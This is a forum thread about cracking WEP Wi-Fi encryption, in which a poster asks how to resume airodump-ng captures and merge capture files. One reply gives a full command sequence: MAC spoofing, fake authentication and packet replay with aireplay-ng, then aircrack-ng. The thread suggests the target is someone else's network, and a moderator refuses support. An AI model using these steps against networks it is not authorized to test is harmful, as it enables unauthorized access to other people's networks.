Thread: Wep Cracking Assistance (Resuming Session + Mergecap not working)

Hybrid View

Just burned his ISO

Default Wep Cracking Assistance (Resuming Session + Mergecap not working)

Hi Guys,

I have an AP i'm relaying packets to (-2 -p 0841 attack).

In the beginning the data counts collect quickly - 300 or so a second - but after about 30 mins it crawls down to 0. If I end my airodump session and start again the data count is once again on 300 a second. Why does it stop injecting or relaying packets properly?

I was thinking that to get around this I could do the following:

--
    Resume the previous session - this however does not work when I attempt the following:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0 (where ouput is the previous file I capture to).

It seems to create a new session called output-01-01.cap or some such as opposed to continuing the previous session.

How am I to resume the session properly - e.g having my previous data captured still in the session.

--

If i use mergecap, mergecap -w out.cap output-01.cap output-02.cap then it doesn't merge my captured packets e.g. it merges the 2x .cap files in to out.cap but when I try crack out.cap it hasn't actually merged the iv's? Why not?

Regards,
    J

Just burned his ISO

-1 Airmon-ng STOP wlan0 ( or atheros cards { Ath0 }
    -2 ifconfig WLAN0 down
    -3 macchanger -- mac 00:11:22:33:44:55 WLAN0 { or anything else you like, depending if the mac address is filtered or not }

-4 Airmon-ng START WLAN0
    -5 Airodump-ng -c 1 -w test --bssid {network} wlan0 { C= Channel W= file is being written to }

-6 aireplay-ng -1 0 -a(bssid) - h 00:11:22:33:44:55 WLAN0

-7 aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) -h 00:11:22:33:44:55 wlan0

if prompted (yes) or (no) Data packet - yes

try aircrack-ng for every 5000 packets or so depending on signal power could go fast or slow

WEP only Creating traffic

DragonKnight can you pleas tell me whats the point of changing mac adress?
    Is this step really nesseceary or?

Just burned his ISO

Hi,

I don't know if you quite understood my post.

1.) I am not able to resume a session - so telling me to stop my capture session and start a new one is not going to help. Also mac address change isn't needed because they dont use mac address filtering.

2.) After about 30 mins my card or their ap stops sending/receiving packets. If I restart the airodump session then it captures again at full speed - however it starts a new session despite me using the same name 'output' or 'test' etc.

WHY? I need to be able to resume the session or I will never be able to capture enough iv's as it seems to time out after about 30 mins.

3.) Why does mergecap not work e.g. I do 'mergecap -w out.cap output-01.cap output-02.cap

This should merge output-01 (100k data) and output-02 (200k data) in to out.cap - it says it merges but I do not end up with 300k data, I end up with the original count of 100k. WHY? - I need either resume or merging to work or I will never capture enough iv's.

Any help?

Quote Originally Posted by DragonKnight View Post
    -1 Airmon-ng STOP wlan0 ( or atheros cards { Ath0 }
    -2 ifconfig WLAN0 down
    -3 macchanger -- mac 00:11:22:33:44:55 WLAN0 { or anything else you like, depending if the mac address is filtered or not }

-4 Airmon-ng START WLAN0
    -5 Airodump-ng -c 1 -w test --bssid {network} wlan0 { C= Channel W= file is being written to }

-6 aireplay-ng -1 0 -a(bssid) - h 00:11:22:33:44:55 WLAN0

-7 aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) -h 00:11:22:33:44:55 wlan0

if prompted (yes) or (no) Data packet - yes

try aircrack-ng for every 5000 packets or so depending on signal power could go fast or slow

WEP only Creating traffic

Quote Originally Posted by jsheed_sa View Post
    Hi,

I don't know if you quite understood my post.

1.) I am not able to resume a session - so telling me to stop my capture session and start a new one is not going to help. Also mac address change isn't needed because they dont use mac address filtering.

2.) After about 30 mins my card or their ap stops sending/receiving packets. If I restart the airodump session then it captures again at full speed - however it starts a new session despite me using the same name 'output' or 'test' etc.
    Who's "they"?

I think we all know who "they" are -.- (Neighbourhood....)

this is something we do not support!

read the rules!

www.myownremote.blogspot.com